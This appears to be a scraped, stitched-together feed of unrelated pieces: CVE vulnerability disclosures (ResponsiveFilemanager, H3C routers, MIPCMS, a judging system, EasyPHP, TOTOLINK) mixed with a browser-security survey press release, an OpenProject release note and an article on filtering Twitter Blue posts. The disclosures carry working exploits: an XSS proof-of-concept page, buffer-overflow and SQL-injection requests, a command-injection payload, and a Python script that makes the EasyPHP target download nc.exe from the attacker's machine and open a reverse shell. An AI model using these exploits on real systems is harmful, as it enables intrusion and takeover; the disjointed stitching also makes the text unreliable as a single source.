Cross Site Scripting vulnerability found in Trippo ResponsiveFilemanager v.9.14.0 and before allows a remote attacker to execute arbitrary code via the sort_by parameter in the dialog.php file.

After taking another look at the ResponsiveFilemanager 9.14.0 i noticed that in the dialog.php file on line 229 that if the $\_SESSION\['RF'\]\['sort\_by'\] is already set that there would not be done any validation.  
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L235  
This created a problem because in ajax\_calls.php in the "sort" action in the "sort\_by" parameter it is possible to set that value without any validation.  
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/ajax\_calls.php#L73  
This means if you would first request a session by going to the dialog.php, than going to the ajax\_calls.php and request the sort action and as "sort\_by" parameter you give a html tag.  
Than if you done al that go back to the dialog.php page than $\_SESSION\['RF'\]\["sort\_by"\] would be read and unescaped placed on all places where $sort\_by is used what created stored xss until the session isn't valid anymore.  
A very simple patch would be to add fix\_get\_params() in the dialog.php on line 235 when the $sort\_by is set.  
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L235

I made a simple html file you can use to validate this vulnerability.  
It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change.  
you would need to change all "http://192.168.0.11:3001" to your website.  
When runned it would make 3 iframe's.  
One to request the dialog.php file to get a PHPSESSID and to set $\_SESSION\['RF'\]\["verify"\] as RESPONSIVEfilemanager.  
Second it would open the ajax\_calls.php to set the html tag.  
And tirth it reopens the dialog.php page to trigger the stored xss:

<!DOCTYPE html\>
<html\>
<head\>
<script\>
var url \= "http://192.168.0.11:3001";
/\*\* 
Execute the "sort" action in ajax\_calls.php and set as "sort\_by" a html tag.
This will set $\_SESSION\['RF'\]\["sort\_by"\] on line 73 as my html tag.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/ajax\_calls.php#L73
\*\*/
function iframe1(){
	var ifrm \= document.createElement("iframe");
	ifrm.setAttribute("src", url+"/filemanager/ajax\_calls.php?action=sort&sort\_by=%22%3E%3Cimg/src=%27x%27/onerror=alert(document.domain)%3E", "myWindow", "width=200, height=100");
	ifrm.setAttribute("onload", "iframe2();");
	ifrm.setAttribute("style", "visibility: hidden;");	
	ifrm.style.width \= "640px";
	ifrm.style.height \= "480px";
	document.body.appendChild(ifrm);
}

/\*\* 
Go back to the dialog.php to trigger a xss starting at line 235 because when $\_SESSION\['RF'\]\["sort\_by"\] is already set and the sort\_by parameter isn't set than it would use the data from $\_SESSION\['RF'\]\["sort\_by"\].
And if sort\_by isn't set than it won't execute fix\_get\_params() what would prevented xss.
because in ajax\_calls.php this value wasn't sanitized with fix\_get\_params() when we setted the $\_SESSION\['RF'\]\["sort\_by"\] there is a stored xss until the session is expired.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/dialog.php#L235
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/include/utils.php#L686
\*\*/
function iframe2(){
	var ifrm1 \= document.createElement("iframe");
	ifrm1.setAttribute("src", url+"/filemanager/dialog.php?type=0&lang=en\_EN&popup=0&crossdomain=0&relative\_url=0&akey=key&fldr=/", "myWindow", "width=200, height=100");
	ifrm1.setAttribute("style", "visibility: hidden;");	
	ifrm1.style.width \= "640px";
	ifrm1.style.height \= "480px";
	document.body.appendChild(ifrm1);
}

</script\>
</head\>
<body\>

<iframe src\="http://192.168.0.11:3001/filemanager/dialog.php?type=0&lang=en\_EN&popup=0&crossdomain=0&relative\_url=0&akey=key&fldr=/", width\=200, height\=100 onload\="iframe1();" style\="visibility: hidden;" sandbox\>

</body\>
</html\>

A CVE has been requested.

CVE-2021-31711: Stored xss in v9.14.0 in dialog.php in $_SESSION['RF']["sort_by"] because of no validation if ajax_calls.php setted this session. · Issue #661 · trippo/ResponsiveFilemanager

By Deeba Ahmed
The first-ever browser security survey of CISOs’ security practices reveals CISOs' struggles, displeasure with current security solutions and cloud concerns.
This is a post from HackRead.com Read the original post: LayerX’s Browser Security Survey Reveals: 87% of SaaS Adopters Exposed to Browser-borne Attacks in the Past Year

While the massive shift to SaaS apps has begun more than a decade ago, CISOs are still struggling to address the security debt they incurred. Threats like phishing and account takeover pose alarming risks, with most organizations having been attacked in the past year. Yet, existing network-based solutions like firewalls, proxies and  CASBs, fail to deliver the protection the SaaS environment requires. 

Critical gaps in existing solutions’ capabilities, security architecture that doesn’t recognize the browser as a prominent, standalone attack surface, as well as low resilience to web-borne threats, are among the findings of a new global survey just released by LayerX.

150 CISOs across multiple geographies and verticals were polled about their security practices across various disciplines that ultimately come down to securing users, data, and applications within the browser: secure SaaS access, SaaS security and data protection, BYOD, phishing protection, and browser security posture. 

Respondents’ answers were classified according to their architecture: all-SaaS, hybrid, and mostly on-prem, showing how the relative importance of the browser increases with respect to the level of the organization’s SaaS adoption.   

The main findings include:

*   **Organizations in the cloud are exposed to web-borne attacks.** 87% of all-SaaS adopters and 79% of CISOs in a hybrid environment experienced a web-borne security threat in the past 12 months.
*   **Account takeover is a top concern.** 48% list credential phishing as the riskiest browser threat. Followed by malicious browser extensions (37%), malware download (9%), and browser vulnerabilities (6%).
*   **Unsanctioned apps and shadow identities are perceived as unaddressed security gaps.** 95% of organizations have a coverage level of 50% or less for unsanctioned apps.
*   **Most organizations employ at least two security measures to combat phishing attacks.** 79% employ network security tools, like firewalls and SWGs.
*   **Both all-SaaS and hybrid organizations use network solutions to block phishing, but realize this is not an efficient strategy.** 80% have a coverage level of 50% or less.

  
Incidentally, browser security controls are not perceived as efficient enough, with more than half rating them as efficient to “Some extent”. Luckily, there is a healthy trend towards investing in a browser security solution. Most are leaning towards a browser security solution that can be deployed with commercial browsers that are already in use.

“This is the first time such an all-encompassing survey has been conducted about browser security,” said Or Eshed, CEO of LayerX. “With the browser being the key work interface in the modern environment, our hope is that these survey results help CISOs address web-borne threats and mitigate SaaS-related risks.”

Download the full browser security survey here.

****About LayerX****

LayerX Browser Security Platform was purpose-built to monitor, analyze, and protect against web-borne cyber threats and data risks. Delivered as an enterprise browser extension, LayerX natively integrates with any browser, transforming it into the most secure and manageable workspace – while maintaining a top user experience.

Using LayerX, organizations gain comprehensive protection against all browsing risks and threats that either target the browser directly or attempt to utilize it as a bridge to the organization’s devices, apps, and data.

Led by seasoned veterans of IDF cyber units and the cybersecurity industry, LayerX is reshaping the way cybersecurity is practised and managed by making the browser a key pillar in enterprise cybersecurity. To learn more about LayerX, visit: https://layerxsecurity.com/ 

1.  Vivaldi Integrates Mastodon Into its Web Browser
2.  New Crypto Stealer Hits Chromium-Based Browsers
3.  Mullvad VPN and Tor Project Release Mullvad Browser
4.  ProtonVPN extensions for Chrome and Firefox browsers
5.  Trust Wallet Launches Browser Extension Wallet for Desktop

LayerX’s Browser Security Survey Reveals: 87% of SaaS Adopters Exposed to Browser-borne Attacks in the Past Year

OpenProject is open source project management software. Starting with version 7.4.0 and prior to version 12.5.4, when a user registers and confirms their first two-factor authentication (2FA) device for an account, existing logged in sessions for that user account are not terminated. Likewise, if an administrators creates a mobile phone 2FA device on behalf of a user, their existing sessions are not terminated. The issue has been resolved in OpenProject version 12.5.4 by actively terminating sessions of user accounts having registered and confirmed a 2FA device. As a workaround, users who register the first 2FA device on their account can manually log out to terminate all other active sessions. This is the default behavior of OpenProject but might be disabled through a configuration option. Double check that this option is not overridden if one plans to employ the workaround.

Release date: 2023-05-02

We released OpenProject 12.5.4. The release contains two security related bug fixes and we recommend updating to the newest version.

**Invalidation of existing sessions when 2FA activated \[#48035\]**

When a user registers and confirms their first two-factor authentication (2FA) device for an account, existing logged in sessions for that user account are not terminated. Likewise, if an administrators creates a mobile phone 2FA device on behalf of a user, their existing sessions are not terminated. The issue has been resolved in OpenProject version 12.5.4 by actively terminating sessions of user accounts having registered and confirmed a 2FA device.

This security related issue was responsibly disclosed by Vaishnavi Pardeshi. Thank you for reaching out to us and your help in identifying this issue. If you have a security vulnerability you would like to disclose, please see our statement on security.

**A CVE for this issue is currently being requested**

**Workarounds**

As a workaround, users who register the first 2FA device on their account can manually log out to terminate all other active sessions. This is the default behavior of OpenProject but might be disabled through a configuration option. Double check that this option is not overridden if you plan to employ the workaround.

**Invalidation of password reset link when user changes password in the meantime \[#48036\]**

When a user requests a password reset, an email is sent with a link to confirm and reset the password. If the user changes the password in an active session in the meantime, the password reset link was not invalidated and continued to be usable for the duration of its validity period.

The issue has been resolved in OpenProject version 12.5.4 by actively revoking any active password reset tokens for user accounts having changed their passwords successfully within the application.

This security related issue was responsibly disclosed by Vaishnavi Pardeshi. Thank you for reaching out to us and your help in identifying this issue. If you have a security vulnerability you would like to disclose, please see our statement on security.

**Bug fixes and changes**

*   Fixed: Google reCAPTCHA v2 and V3 changed implementation \[#44115\]
*   Fixed: User activity: Previous link removes user parameter from URL \[#47855\]
*   Fixed: Work package HTML titles needlessly truncated \[#47876\]
*   Fixed: Wrong spacing in Firefox when using line breaks in user content tables \[#48027\]
*   Fixed: Previously Created Session Continue Being Valid After 2FA Activation \[#48035\]
*   Fixed: Forgotten password link does not expire when user changes password in the meantime \[#48036\]

**Contributions**

A big thanks to community members for reporting bugs and helping us identifying and providing fixes.

Special thanks for reporting and finding bugs go to

Björn Schümann

CVE-2023-31140: OpenProject 12.5.4

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function set_tftp_upgrad.

Permalink

Cannot retrieve contributors at this time

**Affected product**

    H3C GR-1200W MiniGRW1A0V100R006
    

**Firmware**

     https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4AE06C,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4AE06C(int a1)
{
  const char \*v2; // \[sp+1Ch\] \[+1Ch\]
  int v3\[8\]; // \[sp+20h\] \[+20h\] BYREF
  char v4\[64\]; // \[sp+40h\] \[+40h\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  memset(v4, 0, sizeof(v4));
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 507252736, v3);
  if ( atoi((const char \*)v3) )
  {
    if ( atoi((const char \*)v3) == 1 )
      CFG\_Set(0, 520359938, "192.168.1.251;255.255.255.0;VLAN1;2");
  }
  else
  {
    CFG\_Set(0, 520359938, v4);
  }
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=set\_tftp\_upgrad&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29693: fengsha/SetTftpUpgrad.md at main · Stevenbaga/fengsha

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function version_set.

Permalink

**Affected product**

    H3C GR-1200W  MiniGRW1A0V100R006
    

**Firmware**

    https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4ACC30,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4ACC30(int a1)
{
  const char \*v2; // \[sp+28h\] \[+28h\]
  int v3\[9\]; // \[sp+2Ch\] \[+2Ch\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 505155584, v3);
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=version\_set&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29696: fengsha/aVersionSet.md at main · Stevenbaga/fengsha

Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.

1.After the administrator logged in, open the following page:  
  
http://127.0.0.1/?s=/admin/article/articleCategory/  
  
2.click 'modify'  
3.fill payload in Category Name :  
  
"><imG/src=1 onerror=alert(1)>  
  
4.save  
5.The request package :  
  
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/  
Content-Type: application/json;charset=utf-8  
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3  
terminal: pc  
uid: 9afb4393b6cddbeb7418ab77  
access-token: 06cdb3c844508158ebb7483c221c9e63  
Content-Length: 324  
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007  
DNT: 1  
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}  

6.open the url it will trigger:  
  
http://127.0.0.1/index.php?s=/article/123/

CVE-2020-18132: There is a Store XSS in Administrator Pannel · Issue #4 · sansanyun/mipcms

Judging Management System v1.0 is vulnerable to SQL Injection. via /php-jms/review_se_result.php?mainevent_id=.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Prohibit-404

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/review\_se\_result.php?mainevent\_id=

Vulnerability location: /php-jms/review\_se\_result.php?mainevent\_id=, mainevent\_id

dbname =jms\_db

\[+\] Payload: /php-jms/review\_se\_result.php?mainevent\_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place --->

GET /php\-jms/review\_se\_result.php?mainevent\_id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-30018: bug_report/SQLi-1.md at main · 10F26/bug_report

A  few simple tools can help filter out most Twitter Blue users (but still see the ones you like).

I'm not here to judge anyone who pays for Twitter Blue. However, I'm not a fan of pay-to-win mechanics. At this point, Twitter is a game where players compete for the most attention; Twitter Blue is overpowered DLC. If you buy a subscription, your tweets are shown at the top of comment threads and prioritized in other contexts, including the “For You” page. This makes Blue the social media equivalent of paying for unlimited ammo or improved body armor, regardless of who you are or whether what you have to say is worth promoting.

It also makes Twitter really annoying to use. No one wants to play with the people who are paying to win. That's why there's so much mockery of, and desire to avoid, Twitter Blue users.

Granted, there are plenty of reasons why longtime Twitter power users—in particular, public figures or people who historically have trouble with impersonators—might pay for Twitter Blue. No one wants to lose an audience they worked hard to build, and Twitter has the right to monetize itself however it likes. You also have the right to consume (or not consume) the social media you choose.

All the same, it can't be denied that a lot of really annoying posts from Twitter Blue users with low follower counts show up in all kinds of contexts. If you don't want to see those posts, I don't blame you, and here's how you can filter them all out:

Blue Lite Blocker

Twitter via Justin Pot

BlueLiteBlocker is a free, open-source browser extension for Chrome and Firefox that can filter comments from Twitter Blue subscribers out of your Twitter timeline. You can install the extension and then use Twitter the way you normally do. All comments from Twitter Blue users will be obscured—you can click “View” if you are absolutely certain you want to see them.

Unlike some extensions (BluesBlocker, for example, or Twitter Blue Blocker), Blue Lite Blocker doesn't affect anyone that you actively follow, meaning it won't accidentally filter out your friends. The extension also allows you to still see the tweets from Twitter Blue users that have a certain number of followers—the default threshold is 100,000, but you can set it to whatever you want.

Twitter via Justin Pot

These two features make Blue Lite Blocker the perfect compromise. It filters out the annoying Twitter Blue users while not affecting the people you care about and the public figures whose posts you might want to see. If there's a Twitter Blue user with a lot of followers who you don't want to see, you can block or mute them manually.

Other Workarounds to Clean Up Twitter

Blue Lite Blocker isn't a perfect solution. It requires a browser extension, which not everyone is going to like, and it doesn’t help on mobile (not that there’s much help on mobile anyway). There are a few alternatives, though.

Twitter via Justin Pot

The first is to make sure you're using the Following tab instead of For You. This tab is just tweets from the people you follow, so it doesn't artificially favor Twitter Blue subscribers. You could also try blocking all retweets if you want to clean things up a little more.

If that's not enough, you could try TweetDeck, the power user's version of Twitter. This tool doesn't have a For You page or any algorithmic sorting, meaning Twitter Blue users aren't artificially boosted on it. TweetDeck is the one part of Twitter that's completely untouched by the recent changes there, and I hope this doesn't change. (So please, no one tell Elon Musk that TweetDeck still exists.)

Another cool extension, if you miss seeing legacy checkmarks, is Eight Dollars. Right now blue checkmarks only show up if someone is paying for Blue, meaning most people who had a checkmark prior to April 20, 2023 no longer have one. Eight Dollars can show you which users were verified before legacy verified checkmarks were removed, which is useful if you trusted the old system.

There's a cat and mouse element to all of this, of course. Twitter's current regime really, really wants to turn Blue checkmarks into sellable status symbols and any tool that diminishes the visibility of Blue subscribers cuts against that goal. They're going to try to find a way to break this, and all similar, tools. For now, though, they work—use them while you can. 

Or you could just abandon your Twitter account, set up a public archive of your tweets, and learn how to get started on Mastodon or Bluesky. Up to you.

Your Twitter Feed Sucks Now. These Free Add-Ons Can Help

EasyPHP Webserver version 14.1 suffers from remote code execution and path traversal vulnerabilities.

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3  
import requests  
import sys

if len(sys.argv) != 5:  
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
    exit(1)

else:  
    target = sys.argv[1]  
    targetport = sys.argv[2]  
    localip = sys.argv[3]  
    localport = sys.argv[4]  
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory

    payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
    print (payload)  
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
    headers = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
    }  
    data = {'app_service_control':payload}

    try:  
        r = requests.post(url, headers=headers, data=data)  
    except requests.exceptions.ReadTimeout:  
        print("The payload has been sent. Check it!")  
        pass

# Vulnerability Type: Path Traversal

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

TOTOLINK X5000R (V9.1.0u.6369\_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 82
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
    Cookie: SESSION_ID=2:1679122532:2
    
    {"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

Tag

#firefox